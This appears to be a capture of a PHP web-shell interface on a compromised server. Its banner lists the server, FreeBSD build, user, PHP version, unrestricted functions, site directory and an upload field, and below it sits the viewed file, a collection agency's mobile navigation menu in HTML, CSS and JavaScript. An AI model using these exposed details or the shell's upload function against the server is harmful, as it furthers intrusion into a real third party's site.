|
Server : Apache/2.4.62 System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64 User : www ( 80) PHP Version : 8.3.8 Disable Function : NONE Directory : /domains/biehlweb/ |
Upload File : |
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>.mobile-container {
max-width: 100%;
margin: auto;
background-color: #555;
height: 40px;
color: white;
border-radius: 10px;
}
.topnav {
overflow: hidden;
background-color: #6f6fc5;
position: relative;
top: 0;
width: 100%;
}
.topnav #myLinks {
display: none;
}
.topnav a {
color: white;
padding: 12px 14px;
text-decoration: none;
font-size: 16px;
display: block;
}
.topnav a.icon {
background: black;
display: block;
position: absolute;
right: 0;
top: 0;
}
.topnav a:hover {
background-color: #ddd;
color: black;
}
.active {
color: white;
}
</style>
</head>
<body>
<!-- Simulate a smartphone / tablet -->
<div class="mobile-container">
<!-- Top Navigation Menu -->
<div class="topnav">
<a href="#home" class="active">MENU</a>
<div id="myLinks">
<a href="index.php">Home</a>
<a href="overview.php">Company Overview</a>
<a href="services.php">Collection Services</a>
<a href="contact.php">Contact</a></a>
<a href="https://www.clientaccessweb.com/Biehl/" target="_blank">Client Portal</a>
</div>
<a href="javascript:void(0);" class="icon" onclick="myFunction()">
<i class="fa fa-bars 2"></i>
</a>
</div>
<!-- End smartphone / tablet look -->
</div>
<script>
function myFunction() {
var x = document.getElementById("myLinks");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script>
<img class="logo" src="logo.jpg">